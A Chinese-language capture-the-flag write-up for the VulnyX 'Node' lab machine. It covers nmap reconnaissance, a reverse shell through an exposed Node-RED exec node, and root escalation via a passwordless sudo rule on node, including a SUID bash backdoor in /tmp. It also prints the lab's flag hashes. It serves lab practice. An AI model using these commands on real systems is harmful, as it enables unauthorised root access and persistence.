Vlx_Node

靶机来源:https://vulnyx.com/

难度:Low

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 17:14 CST
Nmap scan report for 192.168.2.1
Host is up (0.00055s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00049s latency).
MAC Address: 08:00:27:F6:7B:61 (Oracle VirtualBox virtual NIC)
Nmap scan report for sunset.leak.dsz (192.168.2.42)
Host is up (0.00053s latency).
MAC Address: 08:00:27:7E:CE:00 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.15 seconds

靶机IP:192.168.2.42

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.42                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 17:14 CST
Nmap scan report for sunset.leak.dsz (192.168.2.42)
Host is up (0.00041s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1880/tcp open  vsat-control
MAC Address: 08:00:27:7E:CE:00 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 40.44 seconds

开放端口:22、80、1880

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,1880 192.168.2.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 17:15 CST
Nmap scan report for sunset.leak.dsz (192.168.2.42)
Host is up (0.00084s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
1880/tcp open  http    Node.js Express framework
|_http-cors: GET POST PUT DELETE
|_http-title: Node-RED
MAC Address: 08:00:27:7E:CE:00 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.04 seconds

二、WEB渗透

1、80网站

访问80端口,是Apache的默认页面 img

2、1880-Node-RED

访问1880端口,是一个Node-RED img

经过测试发现,存在exec功能的节点 直接反弹shell img

img

成功获取到shell

1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.42] 43348
id
uid=1000(dev) gid=1000(dev) grupos=1000(dev)

稳定shell

1
2
3
4
5
6
7
8
/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

三、权限提升

查看sudo -l

1
2
3
4
5
6
7
dev@node:~$ sudo -l
Matching Defaults entries for dev on node:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dev may run the following commands on node:
    (root) NOPASSWD: /usr/bin/node

用户dev可以无需root密码以root权限执行/usr/bin/node

1-方案一:直接执行系统命令

1
sudo /usr/bin/node -e "require('child_process').spawn('/bin/bash', {stdio: [0,1,2]})"

解释:

  • sudo /usr/bin/node:以 root 身份运行 node。
  • -e "...":直接执行一段 JavaScript 代码。
  • child_process.spawn():Node.js 中用于启动子进程的模块。
  • {stdio: [0,1,2]}:将标准输入、输出、错误绑定到当前终端,实现交互式 shell
1
2
3
dev@node:~$ sudo /usr/bin/node -e "require('child_process').spawn('/bin/bash', {stdio: [0,1,2]})"
root@node:/home/dev# id
uid=0(root) gid=0(root) grupos=0(root)

2-方案二:使用 execSync

如果你只需要执行单条命令(如读取 /etc/shadow):

1
sudo /usr/bin/node -e "console.log(require('child_process').execSync('id').toString())"

但这种方式不是交互式 shell,适合快速验证。

1
2
dev@node:~$ sudo /usr/bin/node -e "console.log(require('child_process').execSync('id').toString())"
uid=0(root) gid=0(root) grupos=0(root)

3-方案三:写入 SUID Shell

创建一个永久提权的后门

1
sudo /usr/bin/node -e " const fs = require('fs'); fs.copyFileSync('/bin/bash', '/tmp/rootbash'); fs.chmodSync('/tmp/rootbash', 0o4755); "

然后直接运行

1
/tmp/rootbash -p

⚠️ 注意:此方法会留下明显痕迹。

四、查看FLAG

1
2
3
rootbash-5.1# cat /root/root.txt /home/dev/user.txt 
022f2cdb73481093671bd0478637826e
7af9fe48030ae8afab06e30ee132d9b4
Vulnyx
#Node-RED #Sudo_node
Vlx_Node
http://miao-sec.github.io/Vulnyx/Vlx_Node/
作者
Miao
发布于
2026年1月13日
许可协议
BY-MIAO